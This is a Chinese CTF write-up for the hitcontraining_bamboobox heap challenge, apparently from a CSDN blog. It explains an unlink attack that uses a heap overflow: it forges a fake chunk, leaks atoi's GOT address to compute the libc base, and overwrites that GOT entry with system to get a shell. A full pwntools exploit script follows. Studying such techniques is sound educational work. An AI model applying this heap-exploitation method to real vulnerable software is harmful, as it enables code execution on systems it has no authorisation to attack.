hitcontraining_bamboobox

最新推荐文章于 2023-12-02 01:08:35 发布
最新推荐文章于 2023-12-02 01:08:35 发布
阅读量218 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53062301/article/details/119849188
版权

一道unlink的题目,题目给出了add,remove,change,show四个功能,漏洞在于没有检查change的范围导致堆溢出,并且题目中给出了system函数,还是伪造fake_chunk来绕过unlink检查,从而实现任意地址写,首先申请3个0x80大小的chunk

add(0x80,'a' * 8)   
add(0x80,'b' * 8)
add(0x80,'c' * 8)

根据调试,我们可以看到0x6020C0+8处是指向0号chunk的指针,所以我们构造FD = 0x6020C8 - 0x10,BK = 0x6020C0 - 0x18然后构造fake_chunk

ptr = 0x6020c8
fake_chunk = p64(0) 
fake_chunk += p64(0x81)
fake_chunk += p64(ptr-0x18) 
fake_chunk += p64(ptr-0x10) 
fake_chunk += 'c'*0x60
fake_chunk += p64(0x80) 
fake_chunk += p64(0x90) 
edit(0,0x90,fake_chunk) 
free(1)

free之后就会0号chunk和1号chunk进行合并到unsorted bin中就可以通过编写0号chunk来修改ptr-0x10处的值

payload = p64(0) * 3 
atoi_got = elf.got["atoi"]
payload += p64(atoi_got)
edit(0,0x20,payload)
show()
ru("0 : ")
atoi_addr = u64(ru(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
system_addr = libcbase + libc.symbols['system']

这里通过show这个功能吧atoi_got表地址打印出来从而算出libc基址

edit(0,0x8,p64(system_addr))
ru(":")
sl("/bin/sh\x00")
a.interactive()

最后将atoi_got该为system地址,就可以在atoi的参数处输入/bin/sh\x00从而get shell

exp如下:

from pwn import *
from LibcSearcher import *
from struct import pack 
context(log_level="debug",os="linux",arch="amd64")
​
sd = lambda x:a.send(x)
sl = lambda x:a.sendline(x)
ru = lambda x:a.recvuntil(x)
rl = lambda :a.recvline()
ra = lambda :a.recv()
rn = lambda x:a.recv(x)
sla = lambda x,y:a.sendlineafter(x,y)
​
local = 'bamboobox'
a = process(local)
libc = ELF("libc-2.24.so")
#a = remote("node4.buuoj.cn",26365)
elf = ELF(local)
def add(size,name):
    sla("Your choice:","2")
    sla("name:",str(size))
    ru("item:")
    sd(name)
​
def free(idx):
    sla("Your choice:","4")
    sla("item:",str(idx))
​
def edit(idx,size,name):
    sla("Your choice:","3")
    sla("item:",str(idx))
    sla("name:",str(size))
    ru("item:")
    sd(name)
​
def show():
    sla("Your choice:","1")
​
add(0x80,'a' * 8)
add(0x80,'b' * 8)
add(0x80,'c' * 8)
gdb.attach(a)
ptr = 0x6020c8
fake_chunk = p64(0) 
fake_chunk += p64(0x81)
fake_chunk += p64(ptr-0x18) 
fake_chunk += p64(ptr-0x10) 
fake_chunk += 'c'*0x60
fake_chunk += p64(0x80) 
fake_chunk += p64(0x90) 
edit(0,0x90,fake_chunk) 
free(1)                 
                            
payload = p64(0) * 3        
atoi_got = elf.got["atoi"]
payload += p64(atoi_got)
edit(0,0x20,payload)
​
show()
ru("0 : ")
atoi_addr = u64(ru(":")[:6].ljust(8,'\x00'))
libcbase = atoi_addr - libc.symbols['atoi']
system_addr = libcbase + libc.symbols['system']
edit(0,0x8,p64(system_addr))
​
ru(":")
sl("/bin/sh\x00")
a.interactive()

Aslhs_0
关注
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 763
格式化字符串
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 410
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
[BUUCTF]PWN——hitcontraining_bamboobox(House of force+unlink)
mcmuyanga的博客
03-02 1340
hitcontraining_bamboobox 附件 步骤 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的执行情况,经典的堆题的菜单,并且根据第一行的提示,估计存在后门 64位ida载入,猜测有后门,检索字符串果真发现了后门,不过根据buu的习性,一般flag在根目录下,这个后门应该用不大上,先记一下magic_addr=0x400d49 main()函数,发现输入5的时候会去执行v4[1],v4[1]里面是goodbye_message的地址,如果后门的
【unlink】hitcontraining_bamboobox
huzai9527的博客
05-13 199
【unlink】hitcontraining_bamboobox 1. ida分析 有存放全局指针的数组,存放格式为itemlist[0]为size,itemlist[1]为指向item的指针 change时没有检测输入长度,存在堆溢出 2.思路 申请3个chunk,编辑chunk0 ,构造fake chunk,溢出到chunk1的size位 free chunk1,unlink后itemlist[1] ->itemlist[-2] 再次编辑chunk0,即编辑item
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 430
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 956
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 931
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
暑假集训——Hitcon_Trainning——lab11_bamboobox——堆unlink
qq_41667316的博客
07-15 440
UNLINK 思路 其实是艰辛的心路历程 这道题是昨天晚上这个时间就想到的思路 [虽然是道基础题但是是难得的一道没看别人exp就想到怎么写的题,当时觉得自己已经登顶了(bushi] 毕竟是一道套路题的确套路了我【微笑.jpg】 change_note这个函数里面没有检查输入长度,堆溢出。堆的几个漏洞里面,堆溢出我只会unlink,所以就顺着这个思路一直往下写了。 UNLINK 概念 合...
HITCON training lab 11——bamboobox
04-23 588
64位程序  #House Of Force 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 _QWORD *v3; // [rsp+8h] [rbp-18h] 4 char buf; // [rsp+10h] [rbp-10h] 5 ...
关于wiki的Unlink攻击理解--附例题BUUCTF-hitcontraining_bamboobox1
qq_30528603的博客
12-02 260
我们知道P的fd和bk都是我们自己构造的。我们假设程序通过溢出或者UAF修改了chunk2的fd和bk,我这里让chunk2的fd指向free的got表地址,bk指向一段内存中我们可读可写可执行的地方(也就是能布置shellcode的)。这样构造的目的是改写下一个chunk的标志位,触发fake_chunk能够进行unlink操作,并且在第二个chunk的数据域构造一个伪chunk。其实就是所谓的断链操作,让P的前一个chunk指向后一个chunk,然后P的后一个chunk指回P的前一个chunk。
hitcontraining_bamboobox的wp
wuyvle的博客
03-16 1181
是个堆题 add函数 change函数 没有判断大小可以进行unlink操作 伪造一个空闲 chunk。 通过 unlink 把 chunk 移到存储 chunk 指针的内存处。 覆盖 chunk 0 指针为 atoi 的 got 表地址并泄露。 覆盖 atoi 的 got 表为 system 函数地址。 给出参数 ‘sh’,调用 atoi 函数拿 shell。 add(0x40,b'a' * 8) add(0x80,b'b' * 8) add(0x80,b'c' * 8) ptr = 0x6020
[BUUCTF]PWN——hitcontraining_unlink
mcmuyanga的博客
01-25 1071
hitcontraining_unlink 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况,经典堆题的菜单 64位ida打开,发现了读出flag的函数?根据buu上的习性,不懂这个路径对不对 main() show() add() edit() delete() 由于存在堆溢出和这个读出flag的函数,我们可以修改fd和bk的值,尝试使用fastbin attack。 #coding:utf-8 from pwn import * conte
BUUCTF pwn wp 71 - 75
fa1c4的blog
11-16 612
ciscn_2019_final_3 picoctf_2018_shellcode jarvisoj_level5 npuctf_2020_easyheap hitcontraining_bamboobox
pwn入门小技巧
qq_36918532的博客
05-24 2925
目前我所遇到的一些pwn的做题技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的题越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
AI企联系统 Ai企业级系统开心版 uniapp适配 Web+H5+微信小程序+抖音小程序+双端APP
11-12
AI企联系统 Ai企业级系统开心版 uniapp适配 Web+H5+微信小程序+抖音小程序+双端APP 一款市面上新出的AI企联系统,项目uniapp开发的,支持3.5 4.0 Mj,此套系统5端适配,Web+H5+微信小程序+抖音小程序+双端APP,支持流量主! 自己有能力的可以二开,UI后台也可以自己改。
2000d.doc
11-12
2000d
通过SpringCloud实现微服务:Eureka+Ribbon+Feign+Zuul.zip
最新发布
11-12
根据书籍《Java微服务架构实践》提供源码,通过SpringCloud实现微服务:Eureka+Ribbon+Feign+Zuul
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Aslhs_0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值